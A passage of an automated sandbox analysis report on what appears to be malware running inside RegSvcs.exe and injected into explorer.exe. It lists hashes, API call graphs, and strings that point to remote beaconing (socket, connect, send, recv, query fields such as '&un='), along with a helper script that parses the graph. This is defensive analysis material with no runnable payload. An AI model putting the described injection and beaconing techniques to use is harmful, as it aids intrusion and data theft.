• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID: $$$
                                                                                            • API String ID: 3446177414-233714265
                                                                                            • Opcode ID: 5cb68574ff63217bb17a318f0cb60be840c285c5d2b61a2799007670f7d6f957
                                                                                            • Instruction ID: 4fe80b09db7b2b3dd9801995ef0f671784c6e7fed5fd07d805bd8b3a79f1ae06
                                                                                            • Opcode Fuzzy Hash: 5cb68574ff63217bb17a318f0cb60be840c285c5d2b61a2799007670f7d6f957
                                                                                            • Instruction Fuzzy Hash: 47512272E00345DFEF24EFA4C9857ADBBB1BF48314F384129D8416B292C779A845EB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID: $
                                                                                            • API String ID: 3446177414-3993045852
                                                                                            • Opcode ID: c83f46a53dd7d4d301b1ae2cfda67b0c3dc56e40a270ebc2e21afdaeb505c5f5
                                                                                            • Instruction ID: 1c5737381b16263588cb983680eead384e97daf874d69f55ac0cc27c4270d424
                                                                                            • Opcode Fuzzy Hash: c83f46a53dd7d4d301b1ae2cfda67b0c3dc56e40a270ebc2e21afdaeb505c5f5
                                                                                            • Instruction Fuzzy Hash: D9418F75E01248ABCB21DF9AC840AEEBBB5BF48714F140129ED04A7351D775ED15EBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID: 0$0
                                                                                            • API String ID: 3446177414-203156872
                                                                                            • Opcode ID: 31ef942004d66bea513107546a1bf6120cb33cd6eeeacdcd5307b74ae60d8405
                                                                                            • Instruction ID: 84251d3c97c1b60ae2729f8599f66d2faf97ec6171bbe094cebd88142bc0d1a4
                                                                                            • Opcode Fuzzy Hash: 31ef942004d66bea513107546a1bf6120cb33cd6eeeacdcd5307b74ae60d8405
                                                                                            • Instruction Fuzzy Hash: 4D416FB2A08706AFC310CF28C544A5ABBE4BF89314F044A2EF589DB341D775E905DF96
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: [
                                                                                            • API String ID: 48624451-784033777
                                                                                            • Opcode ID: fec2fc5ddfe5cb75eb90b103c62bf09181af38a70566d41a16382a1c5fb69736
                                                                                            • Instruction ID: 872098e31c634487b7bb00f52ee0eead3270d56ff71829f758905bdc604464c5
                                                                                            • Opcode Fuzzy Hash: fec2fc5ddfe5cb75eb90b103c62bf09181af38a70566d41a16382a1c5fb69736
                                                                                            • Instruction Fuzzy Hash: 612183BAE00129ABDB10DEA9CD51EEEBBE8AF54740F140156E945D3201EB34DA019BA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Execution Graph

                                                                                            Execution Coverage:1.5%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:11.4%
                                                                                            Total number of Nodes:79
                                                                                            Total number of Limit Nodes:9
                                                                                            execution_graph 20220 f905e12 20224 f904942 20220->20224 20222 f905e45 NtProtectVirtualMemory 20223 f905e70 20222->20223 20225 f904967 20224->20225 20225->20222 20226 f904f82 20227 f904fb8 20226->20227 20229 f905081 20227->20229 20237 f905022 20227->20237 20238 f9015b2 20227->20238 20230 f905134 20229->20230 20232 f905117 getaddrinfo 20229->20232 20229->20237 20236 f9051b2 20230->20236 20230->20237 20241 f901732 20230->20241 20232->20230 20234 f9057f4 setsockopt recv 20234->20237 20235 f905729 20235->20234 20235->20237 20236->20237 20244 f9016b2 20236->20244 20239 f90160a socket 20238->20239 20240 f9015ec 20238->20240 20239->20229 20240->20239 20242 f901788 connect 20241->20242 20243 f90176a 20241->20243 20242->20236 20243->20242 20245 f901705 send 20244->20245 20246 f9016e7 20244->20246 20245->20235 20246->20245 20247 f8f92dd 20251 f8f931a 20247->20251 20248 f8f93fa 20249 f8f9328 SleepEx 20249->20249 20249->20251 20251->20248 20251->20249 20254 f903f12 7 API calls 20251->20254 20255 f8fa432 NtCreateFile 20251->20255 20256 f8f90f2 6 API calls 20251->20256 20254->20251 20255->20251 20256->20251 20257 f904232 20259 f90425c 20257->20259 20260 f904334 20257->20260 20258 f904410 NtCreateFile 20258->20260 20259->20258 20259->20260 20261 f905bac 20262 f905bb1 20261->20262 20295 f905bb6 20262->20295 20296 f8fbb72 20262->20296 20264 f905c2c 20265 f905c85 20264->20265 20267 f905c54 20264->20267 20268 f905c69 20264->20268 20264->20295 20310 f903ab2 NtProtectVirtualMemory 20265->20310 20306 f903ab2 NtProtectVirtualMemory 20267->20306 20271 f905c80 20268->20271 20272 f905c6e 20268->20272 20269 f905c8d 20311 f8fd102 ObtainUserAgentString NtProtectVirtualMemory 20269->20311 20271->20265 20273 f905c97 20271->20273 20308 f903ab2 NtProtectVirtualMemory 20272->20308 20277 f905c9c 20273->20277 20278 f905cbe 20273->20278 20275 f905c5c 20307 f8fcee2 ObtainUserAgentString NtProtectVirtualMemory 
20275->20307 20300 f903ab2 NtProtectVirtualMemory 20277->20300 20282 f905cc7 20278->20282 20283 f905cd9 20278->20283 20278->20295 20280 f905c76 20309 f8fcfc2 ObtainUserAgentString NtProtectVirtualMemory 20280->20309 20312 f903ab2 NtProtectVirtualMemory 20282->20312 20283->20295 20314 f903ab2 NtProtectVirtualMemory 20283->20314 20286 f905ccf 20313 f8fd2f2 ObtainUserAgentString NtProtectVirtualMemory 20286->20313 20288 f905cac 20301 f8fcde2 ObtainUserAgentString 20288->20301 20290 f905ce5 20315 f8fd712 ObtainUserAgentString NtProtectVirtualMemory 20290->20315 20293 f905cb4 20302 f8f9412 20293->20302 20297 f8fbb93 20296->20297 20298 f8fbcb5 CreateMutexW 20297->20298 20299 f8fbcce 20297->20299 20298->20299 20299->20264 20300->20288 20301->20293 20303 f8f9440 20302->20303 20304 f8f9473 20303->20304 20305 f8f944d CreateThread 20303->20305 20304->20295 20305->20295 20306->20275 20307->20295 20308->20280 20309->20295 20310->20269 20311->20295 20312->20286 20313->20295 20314->20290 20315->20295 20316 f8ff8c2 20318 f8ff934 20316->20318 20317 f8ff9a6 20318->20317 20319 f8ff995 ObtainUserAgentString 20318->20319 20319->20317
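The execution_graph line above is a flattened edge list: a decimal node id followed by a hex address and zero or more API names declares a node, and an `A->B` token declares an edge. The Python parser below is an added example for this report, not part of Joe Sandbox or its output; it reads an excerpt of the graph above (the f904f82 network routine, copied verbatim from the report) into nodes and edges, lists the entry nodes, and walks simple paths to recover the longest API call chain, which for this routine is socket, getaddrinfo, connect, send, setsockopt, recv. The function names and the node-detection rule (a digit-only token followed by a 6 to 8 hex-digit token) are this example's own assumptions about the format, not a documented Joe Sandbox grammar.

```python
"""Parse a flattened Joe Sandbox execution_graph edge list and recover the
API-call chain along its longest simple path.

Added example for this report. The token rules below are inferred from the
graph text on the page, not taken from a documented Joe Sandbox format.
"""
import re
from collections import defaultdict

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")     # e.g. "20226->20227"
ADDR_RE = re.compile(r"^[0-9a-f]{6,8}$")    # e.g. "f904f82"

# Excerpt of the execution_graph line above: the f904f82 routine that resolves
# a host, connects, sends and receives (copied verbatim from the report).
SAMPLE = (
    "execution_graph 20226 f904f82 20227 f904fb8 20226->20227 20229 f905081 "
    "20227->20229 20237 f905022 20227->20237 20238 f9015b2 20227->20238 "
    "20230 f905134 20229->20230 20232 f905117 getaddrinfo 20229->20232 "
    "20229->20237 20236 f9051b2 20230->20236 20230->20237 20241 f901732 "
    "20230->20241 20232->20230 20234 f9057f4 setsockopt recv 20234->20237 "
    "20235 f905729 20235->20234 20235->20237 20236->20237 20244 f9016b2 "
    "20236->20244 20239 f90160a socket 20238->20239 20240 f9015ec "
    "20238->20240 20239->20229 20240->20239 20242 f901788 connect "
    "20241->20242 20243 f90176a 20241->20243 20242->20236 20243->20242 "
    "20245 f901705 send 20244->20245 20246 f9016e7 20244->20246 "
    "20245->20235 20246->20245"
)


def parse_execution_graph(text):
    """Return (nodes, edges).

    nodes: id -> {"addr": hex string, "apis": [label tokens]}
    edges: id -> [successor ids]

    A node declaration is a decimal id followed by a hex address; every token
    up to the next declaration or edge belongs to that node's label (API names,
    or a summary such as "7 API calls", which is kept as three tokens).
    """
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    nodes = {}
    edges = defaultdict(list)
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges[m.group(1)].append(m.group(2))
            i += 1
            continue
        if tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = tok
            nodes[current] = {"addr": tokens[i + 1], "apis": []}
            i += 2
            continue
        if current is not None:
            nodes[current]["apis"].append(tok)
        i += 1
    return nodes, dict(edges)


def entry_points(nodes, edges):
    """Node ids with no incoming edge: the graph's roots (function entries)."""
    targets = {dst for dsts in edges.values() for dst in dsts}
    return sorted(n for n in nodes if n not in targets)


def longest_api_chain(nodes, edges, root):
    """API labels met along the simple path from root that touches the most
    API calls. Exhaustive over simple paths, which is fine at the size of
    these graphs (79 nodes in the report above). A node already on the path
    is never re-entered, so self-loops such as the SleepEx node terminate.
    """
    best = []

    def walk(node, on_path, apis):
        nonlocal best
        apis = apis + nodes.get(node, {"apis": []})["apis"]
        if len(apis) > len(best):
            best = apis
        for nxt in edges.get(node, []):
            if nxt not in on_path:
                walk(nxt, on_path | {nxt}, apis)

    walk(root, {root}, [])
    return best


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(SAMPLE)
    for root in entry_points(nodes, edges):
        chain = longest_api_chain(nodes, edges, root)
        print(nodes[root]["addr"], "->", " -> ".join(chain))
```

Feeding the whole execution_graph line to `parse_execution_graph` instead of the excerpt yields six entry points (the routines starting at f905e12, f904f82, f8f92dd, f904232, f905bac and f8ff8c2), so the per-root chains give a quick view of which injected routine does the networking and which do the NtProtectVirtualMemory and ObtainUserAgentString work.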

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 f904f82-f904fb6 1 f904fd6-f904fd9 0->1 2 f904fb8-f904fbc 0->2 4 f9058fe-f90590c 1->4 5 f904fdf-f904fed 1->5 2->1 3 f904fbe-f904fc2 2->3 3->1 6 f904fc4-f904fc8 3->6 7 f904ff3-f904ff7 5->7 8 f9058f6-f9058f7 5->8 6->1 11 f904fca-f904fce 6->11 9 f904ff9-f904ffd 7->9 10 f904fff-f905000 7->10 8->4 9->10 12 f90500a-f905010 9->12 10->12 11->1 13 f904fd0-f904fd4 11->13 14 f905012-f905020 12->14 15 f90503a-f905060 12->15 13->1 13->5 14->15 16 f905022-f905026 14->16 17 f905062-f905066 15->17 18 f905068-f90507c call f9015b2 15->18 16->8 19 f90502c-f905035 16->19 17->18 20 f9050a8-f9050ab 17->20 22 f905081-f9050a2 18->22 19->8 23 f9050b1-f9050b8 20->23 24 f905144-f905150 20->24 22->20 26 f9058ee-f9058ef 22->26 27 f9050e2-f9050f5 23->27 28 f9050ba-f9050dc call f904942 23->28 25 f905156-f905165 24->25 24->26 30 f905167-f905178 call f901552 25->30 31 f90517f-f90518f 25->31 26->8 27->26 29 f9050fb-f905101 27->29 28->27 29->26 33 f905107-f905109 29->33 30->31 35 f905191-f9051ad call f901732 31->35 36 f9051e5-f90521b 31->36 33->26 40 f90510f-f905111 33->40 47 f9051b2-f9051da 35->47 38 f90522d-f905231 36->38 39 f90521d-f90522b 36->39 44 f905233-f905245 38->44 45 f905247-f90524b 38->45 43 f90527f-f905280 39->43 40->26 46 f905117-f905132 getaddrinfo 40->46 51 f905283-f9052e0 call f905d62 call f902482 call f901e72 call f906002 43->51 44->43 48 f905261-f905265 45->48 49 f90524d-f90525f 45->49 46->24 50 f905134-f90513c 46->50 47->36 52 f9051dc-f9051e1 47->52 53 f905267-f90526b 48->53 54 f90526d-f905279 48->54 49->43 50->24 63 f9052e2-f9052e6 51->63 64 f9052f4-f905354 call f905d92 51->64 52->36 53->51 53->54 54->43 63->64 65 f9052e8-f9052ef call f902042 63->65 69 f90535a-f905396 call f905d62 call f906262 call f906002 64->69 70 f90548c-f9054b8 call f905d62 call f906262 64->70 65->64 84 f905398-f9053b7 call f906262 call f906002 69->84 85 f9053bb-f9053e9 call f906262 * 2 69->85 79 
f9054d9-f905590 call f906262 * 3 call f906002 * 2 call f902482 70->79 80 f9054ba-f9054d5 70->80 109 f905595-f9055b9 call f906262 79->109 80->79 84->85 101 f905415-f90541d 85->101 102 f9053eb-f905410 call f906002 call f906262 85->102 105 f905442-f905448 101->105 106 f90541f-f905425 101->106 102->101 105->109 110 f90544e-f905456 105->110 107 f905467-f905487 call f906262 106->107 108 f905427-f90543d 106->108 107->109 108->109 120 f9055d1-f9056ad call f906262 * 7 call f906002 call f905d62 call f906002 call f901e72 call f902042 109->120 121 f9055bb-f9055cc call f906262 call f906002 109->121 110->109 113 f90545c-f90545d 110->113 113->107 132 f9056af-f9056b3 120->132 121->132 135 f9056b5-f9056fa call f901382 call f9017b2 132->135 136 f9056ff-f90572d call f9016b2 132->136 153 f9058e6-f9058e7 135->153 144 f90575d-f905761 136->144 145 f90572f-f905735 136->145 149 f905767-f90576b 144->149 150 f90590d-f905913 144->150 145->144 148 f905737-f90574c 145->148 148->144 154 f90574e-f905754 148->154 157 f905771-f905773 149->157 158 f9058aa-f9058df call f9017b2 149->158 155 f905779-f905784 150->155 156 f905919-f905920 150->156 153->26 154->144 163 f905756 154->163 159 f905795-f905796 155->159 160 f905786-f905793 155->160 156->160 157->155 157->158 158->153 164 f90579c-f9057a0 159->164 160->159 160->164 163->144 167 f9057b1-f9057b2 164->167 168 f9057a2-f9057af 164->168 170 f9057b8-f9057c4 167->170 168->167 168->170 173 f9057f4-f905861 setsockopt recv 170->173 174 f9057c6-f9057ef call f905d92 call f905d62 170->174 177 f9058a3-f9058a4 173->177 178 f905863 173->178 174->173 177->158 178->177 181 f905865-f90586a 178->181 181->177 184 f90586c-f905872 181->184 184->177 186 f905874-f9058a1 184->186 186->177 186->178
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: getaddrinforecvsetsockopt
                                                                                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                            • API String ID: 1564272048-1117930895
                                                                                            • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                            • Instruction ID: bef17407b2b72ad21722f2268907fd8b0d5e66400414d5825220a0fd1e267feb
                                                                                            • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                            • Instruction Fuzzy Hash: D5526B30618B088FDB69FB68C4847E9B7E1FB94300F55462ED49BCB1C7EA34A549CB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID: `
                                                                                            • API String ID: 823142352-2679148245
                                                                                            • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                            • Instruction ID: 840b1aa48dc331b706674e7630162442ebcb98770f5661b721d14152a17b9eaa
                                                                                            • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                            • Instruction Fuzzy Hash: 49224D70A18B099FCB59EF2CC4996AEF7E1FB98301F40462EE55ED7291DB30A451CB81
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • NtProtectVirtualMemory.NTDLL ref: 0F905E67
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2706961497-0
                                                                                            • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                            • Instruction ID: cd604fce78c38b1ad4fcfde4283dc33bf373075dbc43eb195dd54d86f675d39c
                                                                                            • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                            • Instruction Fuzzy Hash: 38019E30628B484F8B88EF6CD48412AB7E4FBC9214F000B3EA99AC3291EB64C5414B82
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • NtProtectVirtualMemory.NTDLL ref: 0F905E67
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2706961497-0
                                                                                            • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                            • Instruction ID: f2e1c3dbc70fff1fa5482bd9fbf51ced00b97ef02594bb1c8fc3e0a646bca377
                                                                                            • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                            • Instruction Fuzzy Hash: EF01A734628B884F8744EB3C94451A6B3E5FBCE314F000B7EE5DAC3251DB25D5014782
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • ObtainUserAgentString.URLMON ref: 0F8FF9A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AgentObtainStringUser
                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                            • API String ID: 2681117516-319646191
                                                                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                            • Instruction ID: d4fe761d934e940772962fadf96030b4dff9b2d28ca23a3289a5d5b386326390
                                                                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                            • Instruction Fuzzy Hash: A131C231614B0C8FCB04EFA8C8487EDB7E0FB98204F44022AD55ED7282DF7886498B89
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • ObtainUserAgentString.URLMON ref: 0F8FF9A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AgentObtainStringUser
                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                            • API String ID: 2681117516-319646191
                                                                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                            • Instruction ID: 4e5377e7d933c06a616e405cd157a69207526cb83b8673aa5d658a3e516ea306
                                                                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                            • Instruction Fuzzy Hash: BB21C331610B0C8ECB04FFA9C8487ED7BB0FF98204F44422AD55AD7292DF789649CB89
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateMutex
                                                                                            • String ID: .dll$el32$kern
                                                                                            • API String ID: 1964310414-1222553051
                                                                                            • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                            • Instruction ID: 92e37acec3ce8e129e462486f08fb50704f3463444555aa55f270e199c01221b
                                                                                            • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                            • Instruction Fuzzy Hash: 6B415B70918A088FDB54EFA8C8987ED77E0FF98300F44417AD94ADB296DE349945CB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateMutex
                                                                                            • String ID: .dll$el32$kern
                                                                                            • API String ID: 1964310414-1222553051
                                                                                            • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                            • Instruction ID: e67da64e9b92de309dc80a1c8a085391604c912d28b04c9a5e57820ecf47c85e
                                                                                            • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                            • Instruction Fuzzy Hash: B7413C70918A088FDB54EFA8C498BED77F0FF98300F44417AD94ADB296DE349945CB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: connect
                                                                                            • String ID: conn$ect
                                                                                            • API String ID: 1959786783-716201944
                                                                                            • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                            • Instruction ID: 2d7c8ea227f0b104c3bf8bc0e5ddda78c6bff592037f221fee7c2c17385f1d59
                                                                                            • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                            • Instruction Fuzzy Hash: 89015E30618B188FCB84EF1CE088B55B7E0FB98314F1545AEE90DCB266C674D8818BC2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: connect
                                                                                            • String ID: conn$ect
                                                                                            • API String ID: 1959786783-716201944
                                                                                            • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                            • Instruction ID: 26ecd158a6b017e2704785dcae44f47c4628bdba7dde55b139ba54f5ae7e943c
                                                                                            • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                            • Instruction Fuzzy Hash: C7012C70618A1C8FCB84EF5CE088B55B7E0FB99314F1541AEA90DCB266CA74C9818BC2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: send
                                                                                            • String ID: send
                                                                                            • API String ID: 2809346765-2809346765
                                                                                            • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                            • Instruction ID: 3f67ae2cbd39a581365ed624116ab80896a385420a11ac2cfe1c1855a966bec9
                                                                                            • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                            • Instruction Fuzzy Hash: E4011270518A188FDB84EF1CD048B2577E0EB98315F1545AED95DCB267C670D8818B81
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: socket
                                                                                            • String ID: sock
                                                                                            • API String ID: 98920635-2415254727
                                                                                            • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                            • Instruction ID: 5e732f12fc0ef864ee425dba4dd17a7daf07f0403c4233ac39873127742a3464
                                                                                            • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                            • Instruction Fuzzy Hash: 840171306187188FCB84EF1CD048B50BBE0FB59314F1545ADE51ECB266C7B0C9818B82
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

Control-flow Graph
